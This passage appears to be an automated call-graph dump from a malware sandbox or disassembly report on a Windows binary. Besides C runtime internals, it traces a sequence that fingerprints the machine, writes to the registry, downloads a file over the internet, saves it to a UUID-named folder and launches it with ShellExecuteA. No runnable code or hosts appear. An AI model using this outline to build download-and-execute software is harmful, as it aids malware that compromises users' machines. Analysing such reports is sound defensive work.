WriteFile 39936->39939 39943 f21602 39936->39943 40831 f30be4 39937->40831 39939->39931 39939->39943 39957->39923 39996->39932 39998->39544 40000 f2babb ShowWindow UpdateWindow 39999->40000 40001 f2bab9 39999->40001 40000->39546 40001->39546 40014->39331 40015->39367 40017 f21ad0 40016->40017 40018 f21af4 40016->40018 40019 f21afc 40017->40019 40020 f21adc DispatchMessageW PeekMessageW 40017->40020 40018->39373 40019->39373 40020->40017 40020->40018 40021->39374 40022->39517 40023->39549 40025 f23ff0 59 API calls 40024->40025 40026 f2303e 40025->40026 40026->39653 40029 f25d66 40028->40029 40030 f25dfe 40028->40030 40032 f26950 59 API calls 40029->40032 40037 f25d84 ___crtGetEnvironmentStringsW 40029->40037 40031 f5f23e 59 API calls 40030->40031 40033 f25e08 40031->40033 40034 f25d76 40032->40034 40035 f5f23e 59 API calls 40033->40035 40034->39671 40036 f25e1a 40035->40036 40036->39671 40037->39671 40038->39671 40040 f30241 40039->40040 40041 f302b6 40039->40041 40043 f35208 __wcsnicmp 58 API calls 40040->40043 40048 f30266 40040->40048 40050 f302c8 60 API calls 3 library calls 40041->40050 40045 f3024d 40043->40045 40044 f302c3 40044->39685 40049 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40045->40049 40047 f30258 40047->39685 40048->39685 40049->40047 40050->40044 40051->39712 40052->39711 40054 f33b4c 59 API calls 40053->40054 40055 f1b164 40054->40055 40056 f1b177 SysAllocString 40055->40056 40057 f1b194 40055->40057 40056->40057 40057->39725 40059 f1b1de 40058->40059 40061 f1b202 40058->40061 40060 f1b1f5 SysFreeString 40059->40060 40059->40061 40060->40061 40061->39727 40063 f33add __aulldiv 40062->40063 40063->39764 40077 f4035d 40064->40077 40066 f3355a 40067 f1d78f 40066->40067 40085 f33576 40066->40085 40069 f328e0 40067->40069 40182 f3279f 40069->40182 40073 f1b423 40072->40073 40074 f1b41d 40072->40074 40075 f1b42d VariantClear 40073->40075 40074->39786 40075->39786 40076->39738 40078 f3501f __getptd_noexit 58 API calls 40077->40078 40079 f40363 40078->40079 40080 f40369 40079->40080 40082 f4038d 40079->40082 40118 f38cde 58 API calls 2 library calls 40079->40118 40081 f35208 __wcsnicmp 58 API calls 40080->40081 40080->40082 40083 f4036e 40081->40083 40082->40066 40083->40066 40086 f33591 40085->40086 40087 f335a9 _memset 40085->40087 40088 f35208 __wcsnicmp 58 API calls 40086->40088 40087->40086 40094 f335c0 40087->40094 40089 f33596 40088->40089 40127 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40089->40127 40091 f335cb 40093 f35208 __wcsnicmp 58 API calls 40091->40093 40092 f335e9 40119 f3fb64 40092->40119 40117 f335a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 40093->40117 40094->40091 40094->40092 40096 f335ee 40128 f3f803 58 API calls __wcsnicmp 40096->40128 40098 f335f7 40099 f337e5 40098->40099 40129 f3f82d 58 API calls __wcsnicmp 40098->40129 40142 f342fd 8 API calls 2 library calls 40099->40142 40102 f33609 40102->40099 40130 f3f857 40102->40130 40103 f337ef 40105 f3361b 40105->40099 40106 f33624 40105->40106 40107 f3369b 40106->40107 40109 f33637 40106->40109 40140 f3f939 58 API calls 4 library calls 40107->40140 40137 f3f939 58 API calls 4 library calls 40109->40137 40110 f336a2 40110->40117 40141 f3fbb4 58 API calls 4 library calls 40110->40141 40112 f3364f 40112->40117 40138 f3fbb4 58 API calls 4 library calls 40112->40138 40115 f33668 40115->40117 40139 f3f939 58 API calls 4 library calls 40115->40139 40117->40067 40118->40080 40121 f3fb70 _flsall 40119->40121 40120 f3fba5 _flsall 40120->40096 40121->40120 40122 f38af7 __lock 58 API calls 40121->40122 40123 f3fb80 40122->40123 40124 f3fb93 40123->40124 40143 f3fe47 40123->40143 40172 f3fbab LeaveCriticalSection _doexit 40124->40172 40127->40117 40128->40098 40129->40102 40131 f3f861 40130->40131 40132 f3f876 40130->40132 40133 f35208 __wcsnicmp 58 API calls 40131->40133 40132->40105 40134 f3f866 40133->40134 40181 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40134->40181 40136 f3f871 40136->40105 40137->40112 40138->40115 40139->40117 40140->40110 40141->40117 40142->40103 40144 f3fe53 _flsall 40143->40144 40145 f38af7 __lock 58 API calls 40144->40145 40146 f3fe71 _W_expandtime 40145->40146 40147 f3f857 __tzset_nolock 58 API calls 40146->40147 40148 f3fe86 40147->40148 40163 f3ff25 __tzset_nolock __isindst_nolock 40148->40163 40173 f3f803 58 API calls __wcsnicmp 40148->40173 40151 f3fe98 40151->40163 40174 f3f82d 58 API calls __wcsnicmp 40151->40174 40152 f3ff71 GetTimeZoneInformation 40152->40163 40153 f30bed _free 58 API calls 40153->40163 40155 f3feaa 40155->40163 40175 f43f99 58 API calls 2 library calls 40155->40175 40157 f3ffd8 WideCharToMultiByte 40157->40163 40158 f3feb8 40176 f51667 78 API calls 3 library calls 40158->40176 40159 f40010 WideCharToMultiByte 40159->40163 40162 f3ff0c _strlen 40177 f38cde 58 API calls 2 library calls 40162->40177 40163->40152 40163->40153 40163->40157 40163->40159 40164 f40157 __tzset_nolock _flsall __isindst_nolock 40163->40164 40170 f4ff8e 58 API calls __tzset_nolock 40163->40170 40171 f33c2d 61 API calls UnDecorator::getZName 40163->40171 40179 f342fd 8 API calls 2 library calls 40163->40179 40180 f400d7 LeaveCriticalSection _doexit 40163->40180 40164->40124 40166 f3fed9 _is_exception_typeof 40166->40162 40166->40163 40167 f30bed _free 58 API calls 40166->40167 40167->40162 40168 f3ff1a _strlen 40168->40163 40178 f3c0fd 58 API calls __wcsnicmp 40168->40178 40170->40163 40171->40163 40172->40120 40173->40151 40174->40155 40175->40158 40176->40166 40177->40168 40178->40163 40179->40163 40180->40163 40181->40136 40209 f3019c 40182->40209 40185 f327d4 40186 f35208 __wcsnicmp 58 API calls 40185->40186 40187 f327d9 40186->40187 40217 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40187->40217 40188 f327e9 MultiByteToWideChar 40190 f32815 40188->40190 40191 f32804 GetLastError 40188->40191 40219 f38cde 58 API calls 2 library calls 40190->40219 40218 f351e7 58 API calls 3 library calls 40191->40218 40194 f3281d 40195 f32825 MultiByteToWideChar 40194->40195 40208 f32810 40194->40208 40195->40191 40196 f3283f 40195->40196 40220 f38cde 58 API calls 2 library calls 40196->40220 40197 f30bed _free 58 API calls 40198 f328a0 40197->40198 40200 f30bed _free 58 API calls 40198->40200 40202 f1d7a3 40200->40202 40201 f3284a 40201->40208 40221 f3d51e 88 API calls 3 library calls 40201->40221 40202->39769 40204 f32866 40205 f3286f WideCharToMultiByte 40204->40205 40204->40208 40206 f3288b GetLastError 40205->40206 40205->40208 40222 f351e7 58 API calls 3 library calls 40206->40222 40208->40197 40210 f301fa 40209->40210 40211 f301ad 40209->40211 40210->40185 40210->40188 40223 f35007 40211->40223 40213 f301b3 40214 f301da 40213->40214 40228 f345dc 58 API calls 6 library calls 40213->40228 40214->40210 40229 f3495e 58 API calls 6 library calls 40214->40229 40217->40202 40218->40208 40219->40194 40220->40201 40221->40204 40222->40208 40224 f3501f __getptd_noexit 58 API calls 40223->40224 40225 f3500d 40224->40225 40227 f3501a 40225->40227 40230 f37c2e 58 API calls 3 library calls 40225->40230 40227->40213 40228->40214 40229->40210 40232 f30c62 _malloc 58 API calls 40231->40232 40233 f1e684 40232->40233 40234 f30c62 _malloc 58 API calls 40233->40234 40235 f1e690 40234->40235 40236 f1e6b4 GetAdaptersInfo 40235->40236 40237 f1e699 40235->40237 40239 f1e6c4 40236->40239 40240 f1e6db GetAdaptersInfo 40236->40240 40238 f31f2d _wprintf 85 API calls 40237->40238 40243 f1e6a3 40238->40243 40244 f30bed _free 58 API calls 40239->40244 40241 f1e741 40240->40241 40242 f1e6ea 40240->40242 40247 f30bed _free 58 API calls 40241->40247 40281 f304a6 40242->40281 40246 f30bed _free 58 API calls 40243->40246 40248 f1e6ca 40244->40248 40250 f1e6a9 40246->40250 40251 f1e74a 40247->40251 40252 f30c62 _malloc 58 API calls 40248->40252 40250->39797 40251->39797 40254 f1e6d2 40252->40254 40254->40237 40254->40240 40255 f1e737 40256 f31f2d _wprintf 85 API calls 40255->40256 40256->40241 40258 f256d0 59 API calls 40257->40258 40259 f1e8bb CryptAcquireContextW 40258->40259 40260 f1e8e9 CryptCreateHash 40259->40260 40261 f1e8d8 40259->40261 40263 f1e903 40260->40263 40264 f1e914 CryptHashData 40260->40264 40506 f40eca RaiseException 40261->40506 40507 f40eca RaiseException 40263->40507 40266 f1e943 CryptGetHashParam 40264->40266 40267 f1e932 40264->40267 40269 f1e963 40266->40269 40271 f1e974 _memset 40266->40271 40508 f40eca RaiseException 40267->40508 40509 f40eca RaiseException 40269->40509 40272 f1e993 CryptGetHashParam 40271->40272 40273 f1e9a8 40272->40273 40279 f1e9b9 40272->40279 40510 f40eca RaiseException 40273->40510 40275 f1ea10 40277 f1ea16 CryptDestroyHash CryptReleaseContext 40275->40277 40276 f304a6 _sprintf 83 API calls 40276->40279 40278 f1ea33 40277->40278 40278->39803 40279->40275 40279->40276 40280 f23ea0 59 API calls 40279->40280 40280->40279 40282 f304c2 40281->40282 40283 f304d7 40281->40283 40285 f35208 __wcsnicmp 58 API calls 40282->40285 40283->40282 40284 f304de 40283->40284 40310 f36ab6 40284->40310 40286 f304c7 40285->40286 40309 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40286->40309 40289 f30504 40290 f1e725 40289->40290 40334 f364ef 78 API calls 5 library calls 40289->40334 40292 f31f2d 40290->40292 40293 f31f39 _flsall 40292->40293 40294 f31f4a 40293->40294 40295 f31f5f __flsbuf 40293->40295 40296 f35208 __wcsnicmp 58 API calls 40294->40296 40354 f30e92 40295->40354 40297 f31f4f 40296->40297 40370 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40297->40370 40300 f31f6f __flsbuf 40359 f3afd2 40300->40359 40301 f31f5a _flsall 40301->40255 40303 f31f82 __flsbuf 40304 f36ab6 __output_l 83 API calls 40303->40304 40305 f31f9b __flsbuf 40304->40305 40366 f3afa1 40305->40366 40309->40290 40311 f3019c _LocaleUpdate::_LocaleUpdate 58 API calls 40310->40311 40312 f36b2b 40311->40312 40313 f35208 __wcsnicmp 58 API calls 40312->40313 40314 f36b30 40313->40314 40315 f37601 40314->40315 40328 f36b50 __aulldvrm __woutput_s_l _strlen 40314->40328 40342 f3816b 40314->40342 40316 f35208 __wcsnicmp 58 API calls 40315->40316 40317 f37606 40316->40317 40351 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40317->40351 40319 f375db 40335 f3a77e 40319->40335 40322 f375fd 40322->40289 40324 f3766a 78 API calls _write_string 40324->40328 40325 f371b9 DecodePointer 40325->40328 40326 f30bed _free 58 API calls 40326->40328 40327 f376de 78 API calls _write_string 40327->40328 40328->40315 40328->40319 40328->40324 40328->40325 40328->40326 40328->40327 40329 f4adf7 60 API calls __cftof 40328->40329 40331 f3721c DecodePointer 40328->40331 40332 f376b2 78 API calls _write_multi_char 40328->40332 40333 f37241 DecodePointer 40328->40333 40349 f32bcc 58 API calls _LocaleUpdate::_LocaleUpdate 40328->40349 40350 f38cde 58 API calls 2 library calls 40328->40350 40329->40328 40331->40328 40332->40328 40333->40328 40334->40290 40336 f3a786 40335->40336 40337 f3a788 IsProcessorFeaturePresent 40335->40337 40336->40322 40339 f3ab9c 40337->40339 40352 f3ab4b 5 API calls ___raise_securityfailure 40339->40352 40341 f3ac7f 40341->40322 40343 f38175 40342->40343 40344 f3818a 40342->40344 40345 f35208 __wcsnicmp 58 API calls 40343->40345 40344->40328 40346 f3817a 40345->40346 40353 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40346->40353 40348 f38185 40348->40328 40349->40328 40350->40328 40351->40319 40352->40341 40353->40348 40355 f30eb3 EnterCriticalSection 40354->40355 40356 f30e9d 40354->40356 40355->40300 40357 f38af7 __lock 58 API calls 40356->40357 40358 f30ea6 40357->40358 40358->40300 40360 f3816b __flsbuf 58 API calls 40359->40360 40361 f3afdf 40360->40361 40372 f489c2 40361->40372 40363 f3afe5 __flsbuf 40364 f3b034 40363->40364 40381 f38cde 58 API calls 2 library calls 40363->40381 40364->40303 40367 f3afaa 40366->40367 40368 f31faf 40366->40368 40367->40368 40383 f3836b 40367->40383 40371 f31fc9 LeaveCriticalSection LeaveCriticalSection __flsbuf __getstream 40368->40371 40370->40301 40371->40301 40373 f489cd 40372->40373 40374 f489da 40372->40374 40375 f35208 __wcsnicmp 58 API calls 40373->40375 40377 f489e6 40374->40377 40378 f35208 __wcsnicmp 58 API calls 40374->40378 40376 f489d2 40375->40376 40376->40363 40377->40363 40379 f48a07 40378->40379 40382 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40379->40382 40381->40364 40382->40376 40384 f3837e 40383->40384 40388 f383a2 40383->40388 40385 f3816b __flsbuf 58 API calls 40384->40385 40384->40388 40386 f3839b 40385->40386 40389 f3df14 40386->40389 40388->40368 40390 f3df20 _flsall 40389->40390 40391 f3df2d 40390->40391 40393 f3df44 40390->40393 40489 f351d4 58 API calls __getptd_noexit 40391->40489 40392 f3dfe3 40493 f351d4 58 API calls __getptd_noexit 40392->40493 40393->40392 40395 f3df58 40393->40395 40398 f3df80 40395->40398 40399 f3df76 40395->40399 40397 f3df32 40401 f35208 __wcsnicmp 58 API calls 40397->40401 40417 f4b134 40398->40417 40490 f351d4 58 API calls __getptd_noexit 40399->40490 40400 f3df7b 40405 f35208 __wcsnicmp 58 API calls 40400->40405 40412 f3df39 _flsall 40401->40412 40404 f3df86 40406 f3df99 40404->40406 40407 f3dfac 40404->40407 40408 f3dfef 40405->40408 40426 f3e003 40406->40426 40411 f35208 __wcsnicmp 58 API calls 40407->40411 40494 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40408->40494 40414 f3dfb1 40411->40414 40412->40388 40413 f3dfa5 40492 f3dfdb LeaveCriticalSection __unlock_fhandle 40413->40492 40491 f351d4 58 API calls __getptd_noexit 40414->40491 40418 f4b140 _flsall 40417->40418 40419 f4b18f EnterCriticalSection 40418->40419 40420 f38af7 __lock 58 API calls 40418->40420 40421 f4b1b5 _flsall 40419->40421 40422 f4b165 40420->40422 40421->40404 40423 f4b17d 40422->40423 40495 f4263e InitializeCriticalSectionAndSpinCount 40422->40495 40496 f4b1b9 LeaveCriticalSection _doexit 40423->40496 40427 f3e010 __ftell_nolock 40426->40427 40428 f3e04f 40427->40428 40429 f3e06e 40427->40429 40457 f3e044 40427->40457 40497 f351d4 58 API calls __getptd_noexit 40428->40497 40432 f3e0c6 40429->40432 40433 f3e0aa 40429->40433 40430 f3a77e __fltin2 6 API calls 40434 f3e864 40430->40434 40437 f3e0df 40432->40437 40501 f3f744 60 API calls 3 library calls 40432->40501 40499 f351d4 58 API calls __getptd_noexit 40433->40499 40434->40413 40435 f3e054 40438 f35208 __wcsnicmp 58 API calls 40435->40438 40439 f489c2 __flsbuf 58 API calls 40437->40439 40442 f3e05b 40438->40442 40443 f3e0ed 40439->40443 40440 f3e0af 40444 f35208 __wcsnicmp 58 API calls 40440->40444 40498 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40442->40498 40446 f3e446 40443->40446 40451 f35007 ___CxxUnregisterExceptionObject 58 API calls 40443->40451 40447 f3e0b6 40444->40447 40448 f3e464 40446->40448 40449 f3e7d9 WriteFile 40446->40449 40500 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40447->40500 40452 f3e588 40448->40452 40460 f3e47a 40448->40460 40453 f3e439 GetLastError 40449->40453 40482 f3e678 40449->40482 40454 f3e119 GetConsoleMode 40451->40454 40465 f3e67d 40452->40465 40467 f3e593 40452->40467 40458 f3e406 40453->40458 40454->40446 40456 f3e158 40454->40456 40455 f3e812 40455->40457 40462 f35208 __wcsnicmp 58 API calls 40455->40462 40456->40446 40459 f3e168 GetConsoleCP 40456->40459 40457->40430 40458->40455 40458->40457 40464 f3e566 40458->40464 40459->40455 40466 f3e197 40459->40466 40460->40455 40460->40458 40461 f3e4e9 WriteFile 40460->40461 40461->40453 40461->40460 40463 f3e840 40462->40463 40505 f351d4 58 API calls __getptd_noexit 40463->40505 40469 f3e571 40464->40469 40470 f3e809 40464->40470 40465->40455 40471 f3e6f2 WideCharToMultiByte 40465->40471 40466->40458 40483 f4c76c 60 API calls __putch_nolock 40466->40483 40484 f3e280 WideCharToMultiByte 40466->40484 40487 f3e2ed 40466->40487 40502 f32d33 58 API calls __isleadbyte_l 40466->40502 40467->40455 40472 f3e5f8 WriteFile 40467->40472 40474 f35208 __wcsnicmp 58 API calls 40469->40474 40504 f351e7 58 API calls 3 library calls 40470->40504 40471->40453 40481 f3e739 40471->40481 40472->40453 40473 f3e647 40472->40473 40473->40458 40473->40467 40473->40482 40476 f3e576 40474->40476 40503 f351d4 58 API calls __getptd_noexit 40476->40503 40477 f3e741 WriteFile 40480 f3e794 GetLastError 40477->40480 40477->40481 40480->40481 40481->40458 40481->40465 40481->40477 40481->40482 40482->40458 40483->40466 40484->40458 40485 f3e2bb WriteFile 40484->40485 40485->40453 40485->40487 40486 f5058c WriteConsoleW CreateFileW __putwch_nolock 40486->40487 40487->40453 40487->40458 40487->40466 40487->40486 40488 f3e315 WriteFile 40487->40488 40488->40453 40488->40487 40489->40397 40490->40400 40491->40413 40492->40412 40493->40400 40494->40412 40495->40423 40496->40419 40497->40435 40498->40457 40499->40440 40500->40457 40501->40437 40502->40466 40503->40457 40504->40457 40505->40457 40506->40260 40507->40264 40508->40266 40509->40271 40510->40279 40512 f23c62 40511->40512 40513 f23c74 _memset 40511->40513 40514 f23c96 40512->40514 40515 f23c67 40512->40515 40513->39808 40517 f5f23e 59 API calls 40514->40517 40516 f33b4c 59 API calls 40515->40516 40518 f23c6d 40516->40518 40517->40518 40518->40513 40528 f5f1bb 59 API calls 3 library calls 40518->40528 40522 f28513 40521->40522 40525 f28520 40521->40525 40522->40525 40529 f25810 59 API calls ___crtGetEnvironmentStringsW 40522->40529 40523 f28619 40523->39810 40525->40523 40526 f5f23e 59 API calls 40525->40526 40527 f26760 59 API calls 40525->40527 40526->40525 40527->40525 40529->40525 40530->39813 40531->39814 40532->39819 40533->39823 40534->39826 40535->39845 40536->39845 40537->39869 40538->39869 40539->39874 40540->39874 40541->39885 40574 f31037 40542->40574 40544 f1c78a 40544->39896 40571 f30546 58 API calls __wcsnicmp 40544->40571 40546 f32909 _flsall 40545->40546 40547 f3291c 40546->40547 40548 f32941 __W_Gettnames_l 40546->40548 40549 f35208 __wcsnicmp 58 API calls 40547->40549 40776 f30e53 40548->40776 40550 f32921 40549->40550 40775 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40550->40775 40553 f3292c _flsall 40554 f32950 40571->39901 40572->39901 40573->39901 40577 f31043 _flsall 40574->40577 40575 f31056 40576 f35208 __wcsnicmp 58 API calls 40575->40576 40578 f3105b 40576->40578 40577->40575 40579 f31087 40577->40579 40623 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 40578->40623 40593 f38df4 40579->40593 40582 f3108c 40583 f310a2 40582->40583 40584 f31095 40582->40584 40585 f310cc 40583->40585 40586 f310ac 40583->40586 40587 f35208 __wcsnicmp 58 API calls 40584->40587 40608 f38f13 40585->40608 40588 f35208 __wcsnicmp 58 API calls 40586->40588 40590 f31066 _flsall @_EH4_CallFilterFunc@8 40587->40590 40588->40590 40590->40544 40594 f38e00 _flsall 40593->40594 40595 f38af7 __lock 58 API calls 40594->40595 40606 f38e0e 40595->40606 40596 f38e82 40625 f38f0a 40596->40625 40597 f38e89 40629 f38cde 58 API calls 2 library calls 40597->40629 40600 f38e90 40600->40596 40630 f4263e InitializeCriticalSectionAndSpinCount 40600->40630 40601 f38eff _flsall 40601->40582 40603 f38b9f __mtinitlocknum 58 API calls 40603->40606 40604 f30e92 _flsall 59 API calls 40604->40606 40605 f38eb6 EnterCriticalSection 40605->40596 40606->40596 40606->40597 40606->40603 40606->40604 40628 f30efc LeaveCriticalSection LeaveCriticalSection _doexit 40606->40628 40617 f38f33 __wsetlocale_nolock 40608->40617 40609 f38f4d 40610 f35208 __wcsnicmp 58 API calls 40609->40610 40612 f38f52 40610->40612 40611 f39108 40611->40609 40615 f3916b 40611->40615 40632 f4c214 40615->40632 40617->40609 40617->40611 40617->40617 40636 f4c232 60 API calls 2 library calls 40617->40636 40619 f39101 40619->40611 40637 f4c232 60 API calls 2 library calls 40619->40637 40623->40590 40631 f38c81 LeaveCriticalSection 40625->40631 40627 f38f11 40627->40601 40628->40606 40629->40600 40630->40605 40631->40627 40636->40619 40775->40553 40777 f30e63 40776->40777 40778 f30e85 EnterCriticalSection 40776->40778 40777->40778 40779 f30e6b 40777->40779 40780 f30e7b 40778->40780 40781 f38af7 __lock 58 API calls 40779->40781 40780->40554 40781->40780 40806 f25ab8 40805->40806 40807 f259e8 40805->40807 40884 f5f26c 59 API calls 3 library calls 40806->40884 40808 f25ac2 40807->40808 40809 f25a02 40807->40809 40884->40808 41190 f3f7c0 __ftell_nolock 41189->41190 41191 f2e6b6 timeGetTime 41190->41191 41192 f33f74 58 API calls 41191->41192 41193 f2e6cc 41192->41193 41304 f1c6a0 RegOpenKeyExW 41193->41304 41196 f2e72e InternetOpenW 41216 f2e6d4 _memset _strstr _wcsstr 41196->41216 41197 f2ea8d lstrlenA lstrcpyA lstrcpyA lstrlenA 41197->41216 41198 f2ea4c SHGetFolderPathA 41200 f2ea67 PathAppendA DeleteFileA 41198->41200 41198->41216 41200->41216 41201 f2eada lstrlenA 41201->41216 41202 f24690 59 API calls 41217 f2e7be _memmove 41202->41217 41203 f2ee4d 41206 f1ef50 58 API calls 41203->41206 41204 f25ae0 59 API calls 41204->41216 41205 f256d0 59 API calls 41205->41216 41212 f2ee5d 41206->41212 41208 f23ff0 59 API calls 41208->41216 41209 f22900 60 API calls 41209->41216 41210 f2eb53 lstrcpyW 41211 f2eb74 lstrlenA 41210->41211 41210->41216 41214 f30c62 _malloc 58 API calls 41211->41214 41213 f23ea0 59 API calls 41212->41213 41219 f2eeb1 41212->41219 41213->41212 41214->41216 41215 f259d0 59 API calls 41215->41216 41216->41196 41216->41197 41216->41198 41216->41201 41216->41203 41216->41204 41216->41205 41216->41208 41216->41209 41216->41210 41216->41211 41216->41215 41216->41217 41218 f2e8f3 lstrcpyW 41216->41218 41220 f2e943 InternetOpenUrlW InternetReadFile 41216->41220 41222 f2eb99 MultiByteToWideChar lstrcpyW 41216->41222 41223 f2e9ec InternetCloseHandle InternetCloseHandle 41216->41223 41226 f2e93c lstrcatW 41216->41226 41227 f2ec3d lstrlenW lstrlenA lstrcpyA lstrcpyA lstrlenA 41216->41227 41230 f2ebf0 SHGetFolderPathA 41216->41230 41233 f2e9c4 lstrlenA 41216->41233 41234 f2ecaa lstrlenA 41216->41234 41237 f33a38 __fcloseall 83 API calls 41216->41237 41242 f2ed1f lstrcpyW 41216->41242 41244 f2ed43 lstrlenA 41216->41244 41249 f2ed68 MultiByteToWideChar lstrcpyW lstrlenW 41216->41249 41253 f2edc3 SHGetFolderPathA 41216->41253 41256 f30bed 58 API calls _free 41216->41256 41309 f1c500 SHGetFolderPathA 41216->41309 41345 f21b10 timeGetTime timeGetTime 41216->41345 41217->41202 41217->41216 41351 f1dd40 73 API calls 4 library calls 41217->41351 41218->41216 41218->41220 41221 f1ef50 58 API calls 41219->41221 41220->41223 41224 f2e97c SHGetFolderPathA 41220->41224 41229 f2eec1 41221->41229 41222->41216 41223->41216 41224->41223 41225 f2e996 PathAppendA 41224->41225 41329 f320b6 41225->41329 41226->41220 41227->41216 41231 f23ea0 59 API calls 41229->41231 41236 f2ef12 41229->41236 41230->41216 41232 f2ec17 PathAppendA DeleteFileA 41230->41232 41231->41229 41232->41216 41332 f32b02 41233->41332 41234->41216 41238 f23ff0 59 API calls 41236->41238 41237->41216 41239 f2ef3a 41238->41239 41240 f22900 60 API calls 41239->41240 41241 f2ef45 lstrcpyW 41240->41241 41247 f2ef6a 41241->41247 41242->41216 41242->41244 41245 f30c62 _malloc 58 API calls 41244->41245 41245->41216 41246 f23ff0 59 API calls 41248 f2ef9f 41246->41248 41247->41246 41250 f22900 60 API calls 41248->41250 41249->41216 41251 f2edad lstrlenW 41249->41251 41252 f2efac lstrcpyW 41250->41252 41251->41216 41257 f2ee44 41251->41257 41252->41257 41253->41216 41255 f2edea PathAppendA DeleteFileA 41253->41255 41255->41216 41256->41216 41259 f2dbf6 __ftell_nolock 41258->41259 41260 f23ff0 59 API calls 41259->41260 41261 f2dc31 41260->41261 41262 f256d0 59 API calls 41261->41262 41263 f2dc82 41262->41263 41264 f23ff0 59 API calls 41263->41264 41265 f2dcb1 41264->41265 41266 f1ecb0 60 API calls 41265->41266 41267 f2dcc5 41266->41267 41268 f2dcf0 LoadLibraryW GetProcAddress 41267->41268 41282 f2e3d3 41267->41282 41269 f23c40 59 API calls 41268->41269 41270 f2dd1a UuidCreate UuidToStringA 41269->41270 41272 f2dd84 41270->41272 41272->41272 41273 f256d0 59 API calls 41272->41273 41274 f2dda7 RpcStringFreeA PathAppendA CreateDirectoryA 41273->41274 41275 f284e0 59 API calls 41274->41275 41276 f2de18 41275->41276 41277 f23ff0 59 API calls 41276->41277 41278 f2de4c 41277->41278 41279 f22900 60 API calls 41278->41279 41280 f2de5c 41279->41280 41281 f23580 59 API calls 41280->41281 41302 f2de73 _memset _wcsstr 41281->41302 41283 f2deec InternetOpenA 41284 f23ff0 59 API calls 41283->41284 41284->41302 41285 f22900 60 API calls 41285->41302 41286 f24690 59 API calls 41292 f2df60 _memmove 41286->41292 41287 f24690 59 API calls 41287->41302 41289 f22840 60 API calls 41289->41302 41290 f2e079 InternetOpenUrlA 41290->41302 41291 f2e0e2 HttpQueryInfoW 41291->41302 41292->41286 41292->41302 41779 f1dd40 73 API calls 4 library calls 41292->41779 41293 f23ff0 59 API calls 41293->41302 41294 f23010 59 API calls 41294->41302 41295 f2e1ec lstrcpyA PathAppendA 41295->41302 41296 f256d0 59 API calls 41297 f2e267 CreateFileA 41296->41297 41298 f2e299 SetFilePointer 41297->41298 41297->41302 41298->41302 41299 f2e2b1 InternetReadFile 41299->41302 41300 f2e2dc WriteFile 41301 f2e316 CloseHandle InternetCloseHandle InternetCloseHandle 41300->41301 41300->41302 41301->41302 41302->41282 41302->41283 41302->41285 41302->41287 41302->41289 41302->41290 41302->41291 41302->41292 41302->41293 41302->41294 41302->41295 41302->41296 41302->41299 41302->41300 41302->41301 41303 f2e334 ShellExecuteA 41302->41303 41303->41302 41305 f1c734 41304->41305 41306 f1c6cc RegQueryValueExW 41304->41306 41305->41216 41307 f1c6fd RegCloseKey 41306->41307 41308 f1c70c RegSetValueExW RegCloseKey 41306->41308 41307->41216 41308->41305 41310 f1c525 41309->41310 41311 f1c52c PathAppendA 41309->41311 41310->41216 41312 f320b6 125 API calls 41311->41312 41313 f1c550 41312->41313 41314 f1c559 41313->41314 41352 f3387f 41313->41352 41314->41216 41316 f1c56c 41365 f33455 41316->41365 41318 f1c572 41378 f30cf4 41318->41378 41320 f1c57a 41321 f1c5a5 41320->41321 41322 f1c589 41320->41322 41323 f33a38 __fcloseall 83 API calls 41321->41323 41395 f322f5 41322->41395 41325 f1c5ab 41323->41325 41325->41216 41327 f33a38 __fcloseall 83 API calls 41328 f1c599 41327->41328 41328->41216 41685 f31ff2 41329->41685 41331 f320c6 41331->41216 41333 f32b0e _flsall 41332->41333 41334 f32b44 41333->41334 41335 f32b2c 41333->41335 41337 f32b3c _flsall 41333->41337 41338 f30e53 __lock_file 59 API calls 41334->41338 41336 f35208 __wcsnicmp 58 API calls 41335->41336 41340 f32b31 41336->41340 41337->41216 41339 f32b4a 41338->41339 41777 f329a9 78 API calls 5 library calls 41339->41777 41776 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41340->41776 41343 f32b5e 41778 f32b7c LeaveCriticalSection LeaveCriticalSection _fwprintf 41343->41778 41346 f21b2f 41345->41346 41350 f21b7f 41345->41350 41347 f21b40 PeekMessageW 41346->41347 41349 f21b58 DispatchMessageW PeekMessageW 41346->41349 41346->41350 41347->41346 41348 f21b70 Sleep timeGetTime 41347->41348 41348->41347 41348->41350 41349->41346 41349->41348 41350->41216 41351->41217 41356 f3388b _flsall 41352->41356 41353 f3389d 41354 f35208 __wcsnicmp 58 API calls 41353->41354 41357 f338a2 41354->41357 41355 f338c3 41358 f30e53 __lock_file 59 API calls 41355->41358 41356->41353 41356->41355 41410 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41357->41410 41359 f338c9 41358->41359 41398 f337f0 41359->41398 41364 f338ad _flsall 41364->41316 41366 f33461 _flsall 41365->41366 41367 f33473 41366->41367 41368 f33488 41366->41368 41369 f35208 __wcsnicmp 58 API calls 41367->41369 41370 f30e53 __lock_file 59 API calls 41368->41370 41371 f33478 41369->41371 41372 f3348e 41370->41372 41507 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41371->41507 41374 f330c5 __ftell_nolock 67 API calls 41372->41374 41375 f33499 41374->41375 41508 f334b9 LeaveCriticalSection LeaveCriticalSection _fwprintf 41375->41508 41377 f33483 _flsall 41377->41318 41379 f30d00 _flsall 41378->41379 41380 f30d24 41379->41380 41381 f30d0e 41379->41381 41383 f3816b __flsbuf 58 API calls 41380->41383 41382 f35208 __wcsnicmp 58 API calls 41381->41382 41384 f30d13 41382->41384 41385 f30d2d 41383->41385 41509 f342d2 9 API calls __invalid_parameter_noinfo_noreturn 41384->41509 41386 f30e53 __lock_file 59 API calls 41385->41386 41388 f30d35 41386->41388 41389 f3836b __flush 78 API calls 41388->41389 41390 f30d41 41389->41390 41392 f3818f __write 64 API calls 